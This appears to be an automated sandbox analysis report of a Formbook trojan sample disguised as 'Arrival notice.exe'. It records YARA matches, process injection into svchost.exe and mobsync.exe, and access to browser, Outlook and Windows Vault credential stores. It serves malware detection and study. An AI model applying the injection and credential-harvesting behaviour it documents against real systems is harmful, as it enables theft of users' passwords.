            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AFB16B12_2_04AFB16B
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A6516C12_2_04A6516C
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A1F17212_2_04A1F172
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A352A012_2_04A352A0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AD12ED12_2_04AD12ED
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A4B2C012_2_04A4B2C0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AD027412_2_04AD0274
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A7739A12_2_04A7739A
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AF03E612_2_04AF03E6
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A3E3F012_2_04A3E3F0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE132D12_2_04AE132D
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A1D34C12_2_04A1D34C
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEA35212_2_04AEA352
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AD0CB512_2_04AD0CB5
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A20CF212_2_04A20CF2
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AA9C3212_2_04AA9C32
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A30C0012_2_04A30C00
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A48DBF12_2_04A48DBF
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A2ADE012_2_04A2ADE0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A4FDC012_2_04A4FDC0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A3AD0012_2_04A3AD00
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE7D7312_2_04AE7D73
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A33D4012_2_04A33D40
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE1D5A12_2_04AE1D5A
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A39EB012_2_04A39EB0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A42E9012_2_04A42E90
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AECE9312_2_04AECE93
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEEEDB12_2_04AEEEDB
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEEE2612_2_04AEEE26
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A30E5912_2_04A30E59
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEFFB112_2_04AEFFB1
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A31F9212_2_04A31F92
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A3CFE012_2_04A3CFE0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A22FC812_2_04A22FC8
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A72F2812_2_04A72F28
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A50F3012_2_04A50F30
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEFF0912_2_04AEFF09
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AA4F4012_2_04AA4F40
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A168B812_2_04A168B8
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A338E012_2_04A338E0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A5E8F012_2_04A5E8F0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A3A84012_2_04A3A840
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A329A012_2_04A329A0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AFA9A612_2_04AFA9A6
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A4696212_2_04A46962
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A3995012_2_04A39950
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A4B95012_2_04A4B950
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04ACDAAC12_2_04ACDAAC
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A75AA012_2_04A75AA0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A2EA8012_2_04A2EA80
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04ADDAC612_2_04ADDAC6
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AA3A6C12_2_04AA3A6C
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEFA4912_2_04AEFA49
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE7A4612_2_04AE7A46
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A4FB8012_2_04A4FB80
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A6DBF912_2_04A6DBF9
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE6BD712_2_04AE6BD7
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEFB7612_2_04AEFB76
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007F1E7012_2_007F1E70
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007ED05012_2_007ED050
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007EB0D012_2_007EB0D0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007F54E012_2_007F54E0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007F36D012_2_007F36D0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_0080BA0012_2_0080BA00
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007ECE3012_2_007ECE30
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007ECE2812_2_007ECE28
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_0483E4E312_2_0483E4E3
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_0483E3C712_2_0483E3C7
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04843C9012_2_04843C90
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_0483D8E812_2_0483D8E8
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_0483E87C12_2_0483E87C
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_0483CB8312_2_0483CB83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 269 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 86 times
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04A77E54 appears 86 times
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04A65130 appears 36 times
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04AAF290 appears 105 times
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04A1B970 appears 269 times
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04A9EA12 appears 84 times
            Source: Arrival notice.exe, 00000002.00000003.1336708354.0000000004B33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Arrival notice.exe
            Source: Arrival notice.exe, 00000002.00000003.1337343029.0000000004CDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Arrival notice.exe
            Source: Arrival notice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
            Source: C:\Users\user\Desktop\Arrival notice.exeFile created: C:\Users\user\AppData\Local\Temp\spiketopJump to behavior
            Source: Arrival notice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Arrival notice.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002E9F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002E7B000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1914568553.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1915469281.0000000002E71000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002E71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Arrival notice.exeReversingLabs: Detection: 55%
            Source: Arrival notice.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\Arrival notice.exeFile read: C:\Users\user\Desktop\Arrival notice.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Arrival notice.exe "C:\Users\user\Desktop\Arrival notice.exe"
            Source: C:\Users\user\Desktop\Arrival notice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival notice.exe"
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
            Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Arrival notice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival notice.exe"Jump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Arrival notice.exeStatic file information: File size 1401539 > 1048576
            Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000009.00000003.1689351235.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689337789.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689193431.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000003.1798946272.000000000124F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JGgOTaRBeKg.exe, 0000000B.00000000.1640439845.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Arrival notice.exe, 00000002.00000003.1338414590.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1337835940.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1338176959.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1620535046.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1622258941.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1725316747.0000000004683000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1727564650.000000000483F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Arrival notice.exe, 00000002.00000003.1338414590.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1337835940.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1338176959.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1620535046.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1622258941.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1725316747.0000000004683000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1727564650.000000000483F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mobsync.pdb source: svchost.exe, 00000009.00000003.1689351235.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689337789.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689193431.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000003.1798946272.000000000124F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000006CFC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000501C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003F7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000006CFC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000501C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003F7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Arrival notice.exeStatic PE information: real checksum: 0xa2135 should be: 0x1586d1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00401A2C push ss; ret 9_2_00401BE6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0041692B push ebp; iretd 9_2_0041692C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004171D8 push 3E387F36h; iretd 9_2_004171E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004031E6 pushad ; retf 9_2_004031E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004051FA push esi; retf 9_2_004051FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040D18F push ss; iretd 9_2_0040D190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0041937E pushad ; ret 9_2_00419387
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040D3E8 push eax; ret 9_2_0040D3E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00401B85 push ss; ret 9_2_00401BE6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00417B93 push ds; retn 037Dh9_2_00417C4F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00411BAC push esi; ret 9_2_00411BAF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042DC63 push ss; retf 2CDBh9_2_0042DD27
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00403490 push eax; ret 9_2_00403492
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00404D32 push esp; iretd 9_2_00404D33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0041F773 push dword ptr [ebx+ecx*8+1Dh]; retf 9_2_0041F7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00418F7F push ebp; ret 9_2_00418F9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036309AD push ecx; mov dword ptr [esp], ecx9_2_036309B6
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0917B1DC push dword ptr [ebx+ecx*8+1Dh]; retf 11_2_0917B249
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_091749E8 push ebp; ret 11_2_09174A03
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_091658F6 push edi; retf 11_2_09165908
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_091658FC push edi; retf 11_2_09165908
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0916C5FC push esi; iretd 11_2_0916C607
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_091735FC push ds; retn 037Dh11_2_091736B8
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_09174DE7 pushad ; ret 11_2_09174DF0
